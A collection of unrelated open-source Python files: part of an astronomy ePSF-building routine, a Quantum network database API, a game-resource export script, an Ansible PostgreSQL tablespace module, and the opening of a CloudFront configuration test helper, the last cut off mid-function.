dx = xcenter_new - xcenter
dy = ycenter_new - ycenter
center_dist_sq = dx**2 + dy**2
if center_dist_sq >= center_dist_sq_prev: # don't shift
break
center_dist_sq_prev = center_dist_sq
dx_total += dx
dy_total += dy
epsf_data = epsf.evaluate(x=x, y=y, flux=1.0,
x_0=xcenter - dx_total,
y_0=ycenter - dy_total)
return epsf_data
def _build_epsf_step(self, stars, epsf=None):
"""
A single iteration of improving an ePSF.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
epsf : `EPSFModel` object, optional
The initial ePSF model. If not input, then the ePSF will be
built from scratch.
Returns
-------
epsf : `EPSFModel` object
The updated ePSF.
"""
if len(stars) < 1:
raise ValueError('stars must contain at least one EPSFStar or '
'LinkedEPSFStar object.')
if epsf is None:
# create an initial ePSF (array of zeros)
epsf = self._create_initial_epsf(stars)
else:
# improve the input ePSF
epsf = copy.deepcopy(epsf)
# compute a 3D stack of 2D residual images
residuals = self._resample_residuals(stars, epsf)
# compute the sigma-clipped average along the 3D stack
with warnings.catch_warnings():
warnings.simplefilter('ignore', category=RuntimeWarning)
warnings.simplefilter('ignore', category=AstropyUserWarning)
residuals = self.flux_residual_sigclip(residuals, axis=0,
masked=False,
return_bounds=False)
if HAS_BOTTLENECK:
residuals = bottleneck.nanmedian(residuals, axis=0)
else:
residuals = np.nanmedian(residuals, axis=0)
# interpolate any missing data (np.nan)
mask = ~np.isfinite(residuals)
if np.any(mask):
residuals = _interpolate_missing_data(residuals, mask,
method='cubic')
# fill any remaining nans (outer points) with zeros
residuals[~np.isfinite(residuals)] = 0.
# add the residuals to the previous ePSF image
new_epsf = epsf._data + residuals
# smooth and recenter the ePSF
new_epsf = self._smooth_epsf(new_epsf)
epsf = EPSFModel(data=new_epsf, origin=epsf.origin,
oversampling=epsf.oversampling,
norm_radius=epsf._norm_radius,
shift_val=epsf._shift_val, normalize=False)
epsf._data = self._recenter_epsf(
epsf, centroid_func=self.recentering_func,
box_size=self.recentering_boxsize,
maxiters=self.recentering_maxiters)
# Return the new ePSF object, but with undersampled grid pixel
# coordinates.
xcenter = (epsf._data.shape[1] - 1) / 2. / epsf.oversampling[0]
ycenter = (epsf._data.shape[0] - 1) / 2. / epsf.oversampling[1]
return EPSFModel(data=epsf._data, origin=(xcenter, ycenter),
oversampling=epsf.oversampling,
norm_radius=epsf._norm_radius,
shift_val=epsf._shift_val)
def build_epsf(self, stars, init_epsf=None):
"""
Iteratively build an ePSF from star cutouts.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
init_epsf : `EPSFModel` object, optional
The initial ePSF model. If not input, then the ePSF will be
built from scratch.
Returns
-------
epsf : `EPSFModel` object
The constructed ePSF.
fitted_stars : `EPSFStars` object
The input stars with updated centers and fluxes derived
from fitting the output ``epsf``.
"""
iter_num = 0
n_stars = stars.n_stars
fit_failed = np.zeros(n_stars, dtype=bool)
epsf = init_epsf
dt = 0.
center_dist_sq = self.center_accuracy_sq + 1.
centers = stars.cutout_center_flat
while (iter_num < self.maxiters and not np.all(fit_failed) and
np.max(center_dist_sq) >= self.center_accuracy_sq):
t_start = time.time()
iter_num += 1
if self.progress_bar:
if iter_num == 1:
dt_str = ' [? s/iter]'
else:
dt_str = f' [{dt:.1f} s/iter]'
print(f'PROGRESS: iteration {iter_num:d} (of max '
f'{self.maxiters}){dt_str}', end='\r')
# build/improve the ePSF
epsf = self._build_epsf_step(stars, epsf=epsf)
# fit the new ePSF to the stars to find improved centers
# we catch fit warnings here -- stars with unsuccessful fits
# are excluded from the ePSF build process
with warnings.catch_warnings():
message = '.*The fit may be unsuccessful;.*'
warnings.filterwarnings('ignore', message=message,
category=AstropyUserWarning)
stars = self.fitter(epsf, stars)
# find all stars where the fit failed
fit_failed = np.array([star._fit_error_status > 0
for star in stars.all_stars])
if np.all(fit_failed):
raise ValueError('The ePSF fitting failed for all stars.')
# permanently exclude fitting any star where the fit fails
# after 3 iterations
if iter_num > 3 and np.any(fit_failed):
idx = fit_failed.nonzero()[0]
for i in idx:
stars.all_stars[i]._excluded_from_fit = True
# if no star centers have moved by more than pixel accuracy,
# stop the iteration loop early
dx_dy = stars.cutout_center_flat - centers
dx_dy = dx_dy[np.logical_not(fit_failed)]
center_dist_sq = np.sum(dx_dy * dx_dy, axis=1, dtype=np.float64)
centers = stars.cutout_center_flat
self._epsf.append(epsf)
dt = time.time() - t_start
return epsf, stars
def _interpolate_missing_data(data, mask, method='cubic'):
"""
Interpolate missing data as identified by the ``mask`` keyword.
Parameters
----------
data : 2D `~numpy.ndarray`
An array containing the 2D image.
mask : 2D bool `~numpy.ndarray`
A 2D booleen mask array with the same shape as the input
``data``, where a `True` value indicates the corresponding
element of ``data`` is masked. The masked data points are
those that will be interpolated.
method : {'cubic', 'nearest'}, optional
The method of used to interpolate the missing data:
* ``'cubic'``: Masked data are interpolated using 2D cubic
splines. This is the default.
* ``'nearest'``: Masked data are interpolated using
nearest-neighbor interpolation.
Returns
-------
data_interp : 2D `~numpy.ndarray`
The interpolated 2D image.
"""
from scipy import interpolate
data_interp = np.array(data, copy=True)
if len(data_interp.shape) != 2:
raise ValueError("'data' must be a 2D array.")
if mask.shape != data.shape:
raise ValueError("'mask' and 'data' must have the same shape.")
y, x = np.indices(data_interp.shape)
xy = np.dstack((x[~mask].ravel(), y[~mask].ravel()))[0]
z = data_interp[~mask].ravel()
if method == 'nearest':
interpol = interpolate.NearestNDInterpolator(xy, z)
elif method == 'cubic':
interpol = interpolate.CloughTocher2DInterpolator(xy, z)
else:
raise ValueError('Unsupported interpolation method.')
xy_missing = np.dstack((x[mask].ravel(), y[mask].ravel()))[0]
data_interp[mask] = interpol(xy_missing)
return data_interp
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nicira Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Somik Behera, Nicira Networks, Inc.
# @author: Brad Hall, Nicira Networks, Inc.
# @author: Dan Wendlandt, Nicira Networks, Inc.
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, exc, joinedload
from quantum.common import constants
from quantum.common import exceptions as q_exc
from quantum.plugins.cisco.db import models
_ENGINE = None
_MAKER = None
BASE = models.BASE
def configure_db(options):
"""Configure database.
Establish the database, create an engine if needed, and register the
models.
:param options: Mapping of configuration options
"""
global _ENGINE
if not _ENGINE:
_ENGINE = create_engine(options['sql_connection'],
echo=False,
echo_pool=True,
pool_recycle=3600)
register_models()
def clear_db():
global _ENGINE
assert _ENGINE
for table in reversed(BASE.metadata.sorted_tables):
_ENGINE.execute(table.delete())
def get_session(autocommit=True, expire_on_commit=False):
"""Helper method to grab session."""
global _MAKER, _ENGINE
if not _MAKER:
assert _ENGINE
_MAKER = sessionmaker(bind=_ENGINE,
autocommit=autocommit,
expire_on_commit=expire_on_commit)
return _MAKER()
def register_models():
"""Register Models and create properties."""
global _ENGINE
assert _ENGINE
BASE.metadata.create_all(_ENGINE)
def unregister_models():
"""Unregister Models, useful clearing out data before testing."""
global _ENGINE
assert _ENGINE
BASE.metadata.drop_all(_ENGINE)
def network_create(tenant_id, name):
session = get_session()
with session.begin():
net = models.Network(tenant_id, name)
session.add(net)
session.flush()
return net
def network_list(tenant_id):
session = get_session()
return (session.query(models.Network).
options(joinedload(models.Network.ports)).
filter_by(tenant_id=tenant_id).
all())
def network_id(net_name):
session = get_session()
networks = (session.query(models.Network).
options(joinedload(models.Network.ports)).
filter_by(name=net_name).
all())
if networks:
return networks
raise q_exc.NetworkNotFound(net_name=net_name)
def network_get(net_id):
session = get_session()
try:
return session.query(models.Network).\
options(joinedload(models.Network.ports)). \
filter_by(uuid=net_id).\
one()
except exc.NoResultFound:
raise q_exc.NetworkNotFound(net_id=net_id)
def network_update(net_id, tenant_id, **kwargs):
session = get_session()
net = network_get(net_id)
for key in kwargs.keys():
net[key] = kwargs[key]
session.merge(net)
session.flush()
return net
def network_destroy(net_id):
session = get_session()
try:
net = (session.query(models.Network).
filter_by(uuid=net_id).
one())
session.delete(net)
session.flush()
return net
except exc.NoResultFound:
raise q_exc.NetworkNotFound(net_id=net_id)
def validate_network_ownership(tenant_id, net_id):
session = get_session()
try:
return (session.query(models.Network).
filter_by(uuid=net_id).
filter_by(tenant_id=tenant_id).
one())
except exc.NoResultFound:
raise q_exc.NetworkNotFound(net_id=net_id)
def port_create(net_id, state=None):
# confirm network exists
network_get(net_id)
session = get_session()
with session.begin():
port = models.Port(net_id)
port['state'] = state or 'DOWN'
session.add(port)
session.flush()
return port
def port_list(net_id):
session = get_session()
return (session.query(models.Port).
options(joinedload(models.Port.network)).
filter_by(network_id=net_id).
all())
def port_get(net_id, port_id):
# confirm network exists
network_get(net_id)
session = get_session()
try:
return (session.query(models.Port).
filter_by(uuid=port_id).
filter_by(network_id=net_id).
one())
except exc.NoResultFound:
raise q_exc.PortNotFound(net_id=net_id, port_id=port_id)
def port_update(port_id, net_id, **kwargs):
# confirm network exists
network_get(net_id)
port = port_get(net_id, port_id)
session = get_session()
for key in kwargs.keys():
if key == "state":
if kwargs[key] not in (constants.PORT_STATUS_ACTIVE,
constants.PORT_STATUS_DOWN):
raise q_exc.StateInvalid(port_state=kwargs[key])
port[key] = kwargs[key]
session.merge(port)
session.flush()
return port
def port_set_attachment(net_id, port_id, new_interface_id):
# confirm network exists
network_get(net_id)
session = get_session()
port = port_get(net_id, port_id)
if new_interface_id != "":
# We are setting, not clearing, the attachment-id
if port['interface_id']:
raise q_exc.PortInUse(net_id=net_id, port_id=port_id,
device_id=port['interface_id'])
try:
port = (session.query(models.Port).
filter_by(interface_id=new_interface_id).
one())
raise q_exc.AlreadyAttached(net_id=net_id,
port_id=port_id,
att_id=new_interface_id,
att_port_id=port['uuid'])
except exc.NoResultFound:
# this is what should happen
pass
port.interface_id = new_interface_id
session.merge(port)
session.flush()
return port
def port_unset_attachment(net_id, port_id):
# confirm network exists
network_get(net_id)
session = get_session()
port = port_get(net_id, port_id)
port.interface_id = None
session.merge(port)
session.flush()
return port
def port_destroy(net_id, port_id):
# confirm network exists
network_get(net_id)
session = get_session()
try:
port = (session.query(models.Port).
filter_by(uuid=port_id).
filter_by(network_id=net_id).
one())
if port['interface_id']:
raise q_exc.PortInUse(net_id=net_id, port_id=port_id,
device_id=port['interface_id'])
session.delete(port)
session.flush()
return port
except exc.NoResultFound:
raise q_exc.PortNotFound(port_id=port_id)
#methods using just port_id
def port_get_by_id(port_id):
session = get_session()
try:
return (session.query(models.Port).
filter_by(uuid=port_id).one())
except exc.NoResultFound:
raise q_exc.PortNotFound(port_id=port_id)
def port_set_attachment_by_id(port_id, new_interface_id):
session = get_session()
port = port_get_by_id(port_id)
if new_interface_id != "":
if port['interface_id']:
raise q_exc.PortInUse(port_id=port_id,
device_id=port['interface_id'])
try:
port = session.query(models.Port).filter_by(
interface_id=new_interface_id).one()
raise q_exc.AlreadyAttached(port_id=port_id,
att_id=new_interface_id,
att_port_id=port['uuid'])
except exc.NoResultFound:
pass
port.interface_id = new_interface_id
session.merge(port)
session.flush()
return port
def port_unset_attachment_by_id(port_id):
session = get_session()
port = port_get_by_id(port_id)
port.interface_id = None
session.merge(port)
session.flush()
return port
def validate_port_ownership(tenant_id, net_id, port_id, session=None):
validate_network_ownership(tenant_id, net_id)
port_get(net_id, port_id)
|
#!/usr/bin/env python3
"""
Copyright 2020 Paul Willworth <[email protected]>
This file is part of Galaxy Harvester.
Galaxy Harvester is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Galaxy Harvester is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with Galaxy Harvester. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import pymysql
from datetime import date, datetime
import time
from time import localtime, strptime, strftime
import dbInfo
def ghConn():
conn = pymysql.connect(host = dbInfo.DB_HOST,
db = dbInfo.DB_NAME,
user = dbInfo.DB_USER,
passwd = dbInfo.DB_PASS)
return conn
def n2z(inVal):
if (inVal == '' or inVal == None or inVal == 'undefined' or inVal == 'None'):
return '0'
else:
return str(inVal)
exportType = 'current'
siteDir= 'galaxyharvester.net/'
# check for command line argument to export all
if len(sys.argv) > 1:
exportType = sys.argv[1]
if exportType == 'all':
criteriaStr = '1=1'
orderStr = ' ORDER BY spawnID'
else:
criteriaStr = 'unavailable IS NULL'
orderStr = ' ORDER BY rt1.resourceTypeName'
# Main program
rfc822time = '%a, %d %b %Y %H:%M:%S -0800'
sys.stdout.write(exportType)
conn = ghConn()
galaxyCursor = conn.cursor()
if (galaxyCursor):
galaxySQL = 'SELECT galaxyID, galaxyName, lastExport, galaxyState FROM tGalaxy;'
galaxyCursor.execute(galaxySQL)
galaxyRow = galaxyCursor.fetchone()
while (galaxyRow != None):
if galaxyRow[3] == 1 and (galaxyRow[2] == None or (date(galaxyRow[2].year, galaxyRow[2].month, galaxyRow[2].day) < date.today())):
if exportType == 'all':
exportFile = siteDir + 'exports/all' + str(galaxyRow[0]) + '.xml'
csvFile = siteDir + 'exports/all' + str(galaxyRow[0]) + '.csv'
else:
exportFile = siteDir + 'exports/current' + str(galaxyRow[0]) + '.xml'
csvFile = siteDir + 'exports/current' + str(galaxyRow[0]) + '.csv'
f = open(exportFile, 'w')
fcsv = open(csvFile, 'w')
f.write('<?xml version="1.0" encoding="iso-8859-15"?>\n')
f.write('<resources as_of_date="' + datetime.fromtimestamp(time.time()).strftime(rfc822time) + '">\n')
fcsv.write('"name","galaxy_id","galaxy_name","enter_date","type_id","type_name","group_id","CR","CD","DR","FL","HR","MA","PE","OQ","SR","UT","ER","unavailable_date","planets"\n')
sqlStr1 = 'SELECT spawnID, spawnName, galaxy, entered, enteredBy, tResources.resourceType, rt1.resourceTypeName, rt1.resourceGroup,'
sqlStr1 += ' CR, CD, DR, FL, HR, MA, PE, OQ, SR, UT, ER,'
sqlStr1 += ' rt1.containerType, verified, verifiedBy, unavailable, unavailableBy, rt1.resourceCategory, galaxyName FROM tResources INNER JOIN tResourceType rt1 ON tResources.resourceType = rt1.resourceType INNER JOIN tGalaxy ON tResources.galaxy = tGalaxy.galaxyID WHERE ' + criteriaStr + ' AND galaxy=' + str(galaxyRow[0])
sqlStr1 = sqlStr1 + orderStr + ';'
cursor = conn.cursor()
cursor.execute(sqlStr1)
row = cursor.fetchone()
while (row != None):
if row[22] != None:
unavailStr = row[22].strftime(rfc822time)
else:
unavailStr = ''
resStr = '<resource>'
resStr += '<name>' + row[1] + '</name>'
resStr += '<galaxy id="' + str(row[2]) + '">' + row[25] + '</galaxy>'
resStr += '<enter_date>' + row[3].strftime(rfc822time) + '</enter_date>'
resStr += '<resource_type id="' + row[5] + '">' + row[6] + '</resource_type>'
resStr += '<group_id>' + row[7] + '</group_id>'
resStr += '<stats>'
if row[8] != None and row[8] > 0:
resStr += '<CR>' + str(row[8]) + '</CR>'
if row[9] != None and row[9] > 0:
resStr += '<CD>' + str(row[9]) + '</CD>'
if row[10] != None and row[10] > 0:
resStr += '<DR>' + str(row[10]) + '</DR>'
if row[11] != None and row[11] > 0:
resStr += '<FL>' + str(row[11]) + '</FL>'
if row[12] != None and row[12] > 0:
resStr += '<HR>' + str(row[12]) + '</HR>'
if row[13] != None and row[13] > 0:
resStr += '<MA>' + str(row[13]) + '</MA>'
if row[14] != None and row[14] > 0:
resStr += '<PE>' + str(row[14]) + '</PE>'
if row[15] != None and row[15] > 0:
resStr += '<OQ>' + str(row[15]) + '</OQ>'
if row[16] != None and row[16] > 0:
resStr += '<SR>' + str(row[16]) + '</SR>'
if row[17] != None and row[17] > 0:
resStr += '<UT>' + str(row[17]) + '</UT>'
if row[18] != None and row[18] > 0:
resStr += '<ER>' + str(row[18]) + '</ER>'
resStr += '</stats>'
if row[22] != None:
resStr += '<unavailable_date>' + unavailStr + '</unavailable_date>'
resStr += '<planets>'
planetSQL = 'SELECT planetName FROM tResourcePlanet INNER JOIN tPlanet ON tResourcePlanet.planetID = tPlanet.planetID WHERE spawnID=' + str(row[0]) + ' AND ' + criteriaStr
planetCursor = conn.cursor()
planetCursor.execute(planetSQL)
planetRow = planetCursor.fetchone()
planetStr = ''
while (planetRow != None):
resStr += '<planet>' + planetRow[0] + '</planet>'
if planetStr == '':
planetSeparator = ''
else:
planetSeparator = '|'
planetStr += planetSeparator + planetRow[0]
planetRow = planetCursor.fetchone()
planetCursor.close()
resStr += '</planets>'
resStr += '</resource>\n'
f.write(resStr)
# write csv file line
csvStr = ('"' + row[1] + '",' + str(row[2]) + ',"' + row[25] + '","' + row[3].strftime(rfc822time) + '","' + row[5] + '","' + row[6] + '","' + row[7] + '",' + n2z(row[8]) + ',' + n2z(row[9]) + ',' + n2z(row[10]) + ',' + n2z(row[11]) + ',' + n2z(row[12]) + ',' + n2z(row[13]) + ',' + n2z(row[14]) + ',' + n2z(row[15]) + ',' + n2z(row[16]) + ',' + n2z(row[17]) + ',' + n2z(row[18]) + ',' + unavailStr + ',"' + planetStr + '"\n')
fcsv.write(csvStr)
row = cursor.fetchone()
f.write('</resources>')
f.close()
fcsv.close()
cursor.execute('UPDATE tGalaxy SET lastExport=NOW() WHERE galaxyID=' + str(galaxyRow[0]) + ';')
cursor.close()
galaxyRow = galaxyCursor.fetchone()
galaxyCursor.close()
conn.close()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Flavien Chantelot (@Dorn-)
# Copyright: (c) 2018, Antoine Levy-Lambert (@antoinell)
# Copyright: (c) 2019, Andrew Klychkov (@Andersson007) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'supported_by': 'community',
'status': ['preview']
}
DOCUMENTATION = r'''
---
module: postgresql_tablespace
short_description: Add or remove PostgreSQL tablespaces from remote hosts
description:
- Adds or removes PostgreSQL tablespaces from remote hosts
U(https://www.postgresql.org/docs/current/sql-createtablespace.html),
U(https://www.postgresql.org/docs/current/manage-ag-tablespaces.html).
version_added: '2.8'
options:
tablespace:
description:
- Name of the tablespace to add or remove.
required: true
type: str
aliases:
- name
location:
description:
- Path to the tablespace directory in the file system.
- Ensure that the location exists and has right privileges.
type: path
aliases:
- path
state:
description:
- Tablespace state.
- I(state=present) implies the tablespace must be created if it doesn't exist.
- I(state=absent) implies the tablespace must be removed if present.
I(state=absent) is mutually exclusive with I(location), I(owner), i(set).
- See the Notes section for information about check mode restrictions.
type: str
default: present
choices: [ absent, present ]
owner:
description:
- Name of the role to set as an owner of the tablespace.
- If this option is not specified, the tablespace owner is a role that creates the tablespace.
type: str
set:
description:
- Dict of tablespace options to set. Supported from PostgreSQL 9.0.
- For more information see U(https://www.postgresql.org/docs/current/sql-createtablespace.html).
- When reset is passed as an option's value, if the option was set previously, it will be removed
U(https://www.postgresql.org/docs/current/sql-altertablespace.html).
type: dict
rename_to:
description:
- New name of the tablespace.
- The new name cannot begin with pg_, as such names are reserved for system tablespaces.
session_role:
description:
- Switch to session_role after connecting. The specified session_role must
be a role that the current login_user is a member of.
- Permissions checking for SQL commands is carried out as though
the session_role were the one that had logged in originally.
type: str
db:
description:
- Name of database to connect to and run queries against.
type: str
aliases:
- login_db
notes:
- I(state=absent) and I(state=present) (the second one if the tablespace doesn't exist) do not
support check mode because the corresponding PostgreSQL DROP and CREATE TABLESPACE commands
can not be run inside the transaction block.
- The default authentication assumes that you are either logging in as or
sudo'ing to the postgres account on the host.
- To avoid "Peer authentication failed for user postgres" error,
use postgres user as a I(become_user).
- This module uses psycopg2, a Python PostgreSQL database adapter. You must
ensure that psycopg2 is installed on the host before using this module.
- If the remote host is the PostgreSQL server (which is the default case), then
PostgreSQL must also be installed on the remote host.
- For Ubuntu-based systems, install the postgresql, libpq-dev, and python-psycopg2 packages
on the remote host before using this module.
requirements: [ psycopg2 ]
author:
- Flavien Chantelot (@Dorn-)
- Antoine Levy-Lambert (@antoinell)
- Andrew Klychkov (@Andersson007)
extends_documentation_fragment: postgres
'''
EXAMPLES = r'''
- name: Create a new tablespace called acme and set bob as an its owner
postgresql_tablespace:
name: acme
owner: bob
location: /data/foo
- name: Create a new tablespace called bar with tablespace options
postgresql_tablespace:
name: bar
set:
random_page_cost: 1
seq_page_cost: 1
- name: Reset random_page_cost option
postgresql_tablespace:
name: bar
set:
random_page_cost: reset
- name: Rename the tablespace from bar to pcie_ssd
postgresql_tablespace:
name: bar
rename_to: pcie_ssd
- name: Drop tablespace called bloat
postgresql_tablespace:
name: bloat
state: absent
'''
RETURN = r'''
queries:
description: List of queries that was tried to be executed.
returned: always
type: str
sample: [ "CREATE TABLESPACE bar LOCATION '/incredible/ssd'" ]
tablespace:
description: Tablespace name.
returned: always
type: str
sample: 'ssd'
owner:
description: Tablespace owner.
returned: always
type: str
sample: 'Bob'
options:
description: Tablespace options.
returned: always
type: dict
sample: { 'random_page_cost': 1, 'seq_page_cost': 1 }
location:
description: Path to the tablespace in the file system.
returned: always
type: str
sample: '/incredible/fast/ssd'
newname:
description: New tablespace name
returned: if existent
type: str
sample: new_ssd
state:
description: Tablespace state at the end of execution.
returned: always
type: str
sample: 'present'
'''
try:
from psycopg2 import __version__ as PSYCOPG2_VERSION
from psycopg2.extras import DictCursor
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT as AUTOCOMMIT
from psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED as READ_COMMITTED
except ImportError:
# psycopg2 is checked by connect_to_db()
# from ansible.module_utils.postgres
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import SQLParseError, pg_quote_identifier
from ansible.module_utils.postgres import connect_to_db, postgres_common_argument_spec
from ansible.module_utils._text import to_native
class PgTablespace(object):
def __init__(self, module, cursor, name):
self.module = module
self.cursor = cursor
self.name = name
self.exists = False
self.owner = ''
self.settings = {}
self.location = ''
self.executed_queries = []
self.new_name = ''
self.opt_not_supported = False
# Collect info:
self.get_info()
def get_info(self):
# Check that spcoptions exists:
opt = self.__exec_sql("SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spcoptions'", add_to_executed=False)
# For 9.1 version and earlier:
location = self.__exec_sql("SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spclocation'", add_to_executed=False)
if location:
location = 'spclocation'
else:
location = 'pg_tablespace_location(t.oid)'
if not opt:
self.opt_not_supported = True
query = ("SELECT r.rolname, (SELECT Null), %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
else:
query = ("SELECT r.rolname, t.spcoptions, %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
res = self.__exec_sql(query, add_to_executed=False)
if not res:
self.exists = False
return False
if res[0][0]:
self.exists = True
self.owner = res[0][0]
if res[0][1]:
# Options exist:
for i in res[0][1]:
i = i.split('=')
self.settings[i[0]] = i[1]
if res[0][2]:
# Location exists:
self.location = res[0][2]
def create(self, location):
query = ("CREATE TABLESPACE %s LOCATION '%s'" % (pg_quote_identifier(self.name, 'database'), location))
return self.__exec_sql(query, ddl=True)
def drop(self):
return self.__exec_sql("DROP TABLESPACE %s" % pg_quote_identifier(self.name, 'database'), ddl=True)
def set_owner(self, new_owner):
if new_owner == self.owner:
return False
query = "ALTER TABLESPACE %s OWNER TO %s" % (pg_quote_identifier(self.name, 'database'), new_owner)
return self.__exec_sql(query, ddl=True)
def rename(self, newname):
query = "ALTER TABLESPACE %s RENAME TO %s" % (pg_quote_identifier(self.name, 'database'), newname)
self.new_name = newname
return self.__exec_sql(query, ddl=True)
def set_settings(self, new_settings):
# settings must be a dict {'key': 'value'}
if self.opt_not_supported:
return False
changed = False
# Apply new settings:
for i in new_settings:
if new_settings[i] == 'reset':
if i in self.settings:
changed = self.__reset_setting(i)
self.settings[i] = None
elif (i not in self.settings) or (str(new_settings[i]) != self.settings[i]):
changed = self.__set_setting("%s = '%s'" % (i, new_settings[i]))
return changed
def __reset_setting(self, setting):
query = "ALTER TABLESPACE %s RESET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return self.__exec_sql(query, ddl=True)
def __set_setting(self, setting):
query = "ALTER TABLESPACE %s SET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return self.__exec_sql(query, ddl=True)
def __exec_sql(self, query, ddl=False, add_to_executed=True):
try:
self.cursor.execute(query)
if add_to_executed:
self.executed_queries.append(query)
if not ddl:
res = self.cursor.fetchall()
return res
return True
except Exception as e:
self.module.fail_json(msg="Cannot execute SQL '%s': %s" % (query, to_native(e)))
return False
# ===========================================
# Module execution.
#
def main():
argument_spec = postgres_common_argument_spec()
argument_spec.update(
tablespace=dict(type='str', aliases=['name']),
state=dict(type='str', default="present", choices=["absent", "present"]),
location=dict(type='path', aliases=['path']),
owner=dict(type='str'),
set=dict(type='dict'),
rename_to=dict(type='str'),
db=dict(type='str', aliases=['login_db']),
session_role=dict(type='str'),
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=(('positional_args', 'named_args'),),
supports_check_mode=True,
)
tablespace = module.params["tablespace"]
state = module.params["state"]
location = module.params["location"]
owner = module.params["owner"]
rename_to = module.params["rename_to"]
settings = module.params["set"]
if state == 'absent' and (location or owner or rename_to or settings):
module.fail_json(msg="state=absent is mutually exclusive location, "
"owner, rename_to, and set")
db_connection = connect_to_db(module, autocommit=True)
cursor = db_connection.cursor(cursor_factory=DictCursor)
# Change autocommit to False if check_mode:
if module.check_mode:
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=False)
else:
db_connection.set_isolation_level(READ_COMMITTED)
# Set defaults:
autocommit = False
changed = False
##############
# Create PgTablespace object and do main job:
tblspace = PgTablespace(module, cursor, tablespace)
# If tablespace exists with different location, exit:
if tblspace.exists and location and location != tblspace.location:
module.fail_json(msg="Tablespace '%s' exists with different location '%s'" % (tblspace.name, tblspace.location))
# Create new tablespace:
if not tblspace.exists and state == 'present':
if rename_to:
module.fail_json(msg="Tablespace %s does not exist, nothing to rename" % tablespace)
if not location:
module.fail_json(msg="'location' parameter must be passed with "
"state=present if the tablespace doesn't exist")
# Because CREATE TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.create(location)
# Drop non-existing tablespace:
elif not tblspace.exists and state == 'absent':
# Nothing to do:
module.fail_json(msg="Tries to drop nonexistent tablespace '%s'" % tblspace.name)
# Drop existing tablespace:
elif tblspace.exists and state == 'absent':
# Because DROP TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.drop()
# Rename tablespace:
elif tblspace.exists and rename_to:
if tblspace.name != rename_to:
changed = tblspace.rename(rename_to)
if state == 'present':
# Refresh information:
tblspace.get_info()
# Change owner and settings:
if state == 'present' and tblspace.exists:
if owner:
changed = tblspace.set_owner(owner)
if settings:
changed = tblspace.set_settings(settings)
tblspace.get_info()
# Rollback if it's possible and check_mode:
if not autocommit:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
cursor.close()
db_connection.close()
# Make return values:
kw = dict(
changed=changed,
state='present',
tablespace=tblspace.name,
owner=tblspace.owner,
queries=tblspace.executed_queries,
options=tblspace.settings,
location=tblspace.location,
)
if state == 'present':
kw['state'] = 'present'
if tblspace.new_name:
kw['newname'] = tblspace.new_name
elif state == 'absent':
kw['state'] = 'absent'
module.exit_json(**kw)
if __name__ == '__main__':
main()
|
#!/usr/bin/python3
from amazonia.classes.cf_distribution_config import CFDistributionConfig, CFCacheBehaviorConfig, CFOriginsConfig
from amazonia.classes.amz_cf_distribution import CFDistributionLeaf, CFDistributionUnit
from network_setup import get_network_config
from nose.tools import *
def create_cf_distribution_config(aliases=['wwwelb.ap-southeast-2.elb.amazonaws.com'],
comment='UnitTestCFDistConfig',
default_root_object='index.html',
enabled=True, price_class='PriceClass_All',
error_page_path='index.html',
acm_cert_arn='arn.acm.certificate',
minimum_protocol_version='TLSv1',
ssl_support_method='sni-only'):
"""
Create a CFDistributionConfig object
:param aliases: A list of DNS CNAME aliases
:param comment: A description for the distribution
:param default_root_object: The object (e.g. index.html) that should be provided when the root URL is requested
:param enabled: Controls whether the distribution is enabled to access user requests
:param price_class: The price class that corresponds with the maximum price to be paid for the service
:param error_page_path: The error page that should be served when an HTTP error code is returned
:param acm_cert_arn: ARN of the ACM certificate
:param minimum_protocol_version: The minimum version of the SSL protocol that should be used for HTTPS
:param ssl_support_method: Specifies how Cloudfront serves HTTPS requests
:return: Instance of CFDistributionConfig
"""
cf_distribution_config = CFDistributionConfig(
aliases=aliases,
comment=comment,
default_root_object=default_root_object,
enabled=enabled,
price_class=price_class,
